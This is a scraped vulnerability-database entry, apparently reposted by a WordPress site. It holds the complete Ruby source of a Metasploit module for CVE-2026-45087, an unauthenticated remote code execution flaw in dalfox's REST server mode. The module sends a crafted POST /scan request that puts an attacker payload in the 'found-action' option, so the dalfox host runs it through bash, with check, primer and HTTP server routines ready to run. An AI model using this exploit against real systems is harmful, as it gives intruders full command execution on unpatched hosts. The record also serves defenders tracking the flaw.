{“lastseen”:”2026-06-25T19:36:56″,”description”:”When dalfox version use exploit\/linux\/http\/dalfoxserverrcecve202645087 msf exploitdalfoxserverrcecve202645087 show targets …targets… msf exploitdalfoxserverrcecve202645087 set TARGET msf exploitdalfoxserverrcecve202645087 show options …show and…”,”published”:”2026-06-25T19:05:00″,”modified”:”2026-06-25T19:05:00″,”type”:”metasploit”,”title”:”Dalfox Found-Action Deserialization RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-DALFOX_SERVER_RCE_CVE_2026_45087-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-45087″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Remote::HttpServer\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Dalfox Found-Action Deserialization RCE’,\\n ‘Description’ =\\u003e %q{\\n When dalfox version \\u003c= 2.12.0 is started in REST API server mode (dalfox server),\\n the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes –api-key.\\n Because model.Options – including FoundAction and FoundActionShell – is deserialized directly from attacker-supplied JSON in POST \/scan,\\n and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,\\n any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.\\n },\\n ‘Author’ =\\u003e [\\n ‘Emmanuel David’, # Vulnerability discovery and PoC\\n ‘Takahiro Yokoyama’ # Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-45087’],\\n [‘GHSA’, ‘v25v-m36w-jp4h’],\\n ],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux Command’, {\\n ‘Arch’ =\\u003e [ ARCH_CMD ], ‘Platform’ =\\u003e [ ‘unix’, ‘linux’ ], ‘Type’ =\\u003e :nix_cmd\\n }\\n ],\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_DELETE’ =\\u003e true,\\n ‘SRVPORT’ =\\u003e 8081,\\n ‘RPORT’ =\\u003e 6664\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”‘\\n },\\n ‘Stance’ =\\u003e Msf::Exploit::Stance::Aggressive,\\n ‘DisclosureDate’ =\\u003e ‘2026-05-07’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SAFE, ],\\n ‘SideEffects’ =\\u003e [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION, ]\\n }\\n )\\n )\\n\\n register_advanced_options([\\n OptInt.new(‘HTTPDELAY’, [false, ‘Number of seconds the web server will wait before termination’, 10])\\n ])\\n end\\n\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘swagger\/index.html’)\\n })\\n return Exploit::CheckCode::Unknown(‘Could not detect the dalfox.’) unless res\\u0026.code == 200\\n\\n Exploit::CheckCode::Appears(‘Dalfox detected.’)\\n end\\n\\n def on_request_uri(cli, request)\\n send_response(cli, \\”\\u003chtml\\u003e\\u003cbody\\u003e#{request.resource}\\u003c\/body\\u003e\\u003c\/html\\u003e\\”)\\n end\\n\\n def primer\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘scan’),\\n ‘headers’ =\\u003e { ‘Content-Type’ =\\u003e ‘application\/json’ },\\n ‘data’ =\\u003e {\\n ‘url’ =\\u003e get_uri,\\n ‘options’ =\\u003e {\\n ‘found-action’ =\\u003e payload.encode,\\n ‘found-action-shell’ =\\u003e ‘bash’,\\n ‘use-headless’ =\\u003e false,\\n ‘worker’ =\\u003e 1,\\n ‘limit-result’ =\\u003e 1\\n }\\n }.to_json\\n })\\n fail_with(Failure::Unknown, ‘Unexpected server reply.’) unless res\\u0026.code == 200\\n end\\n\\n def exploit\\n Timeout.timeout(datastore[‘HTTPDELAY’]) { super }\\n rescue Timeout::Error\\n # When the server stops due to our timeout, this is raised\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/dalfox_server_rce_cve_2026_45087.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/dalfox_server_rce_cve_2026_45087\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-25T19:36:56″,”description”:”When dalfox version use exploit\/linux\/http\/dalfoxserverrcecve202645087 msf exploitdalfoxserverrcecve202645087 show targets …targets… msf exploitdalfoxserverrcecve202645087 set TARGET msf exploitdalfoxserverrcecve202645087 show options …show and…”,”published”:”2026-06-25T19:05:00″,”modified”:”2026-06-25T19:05:00″,”type”:”metasploit”,”title”:”Dalfox Found-Action Deserialization RCE”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-DALFOX_SERVER_RCE_CVE_2026_45087-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-45087″],”sourceData”:”##\\n# This module…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-65930","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n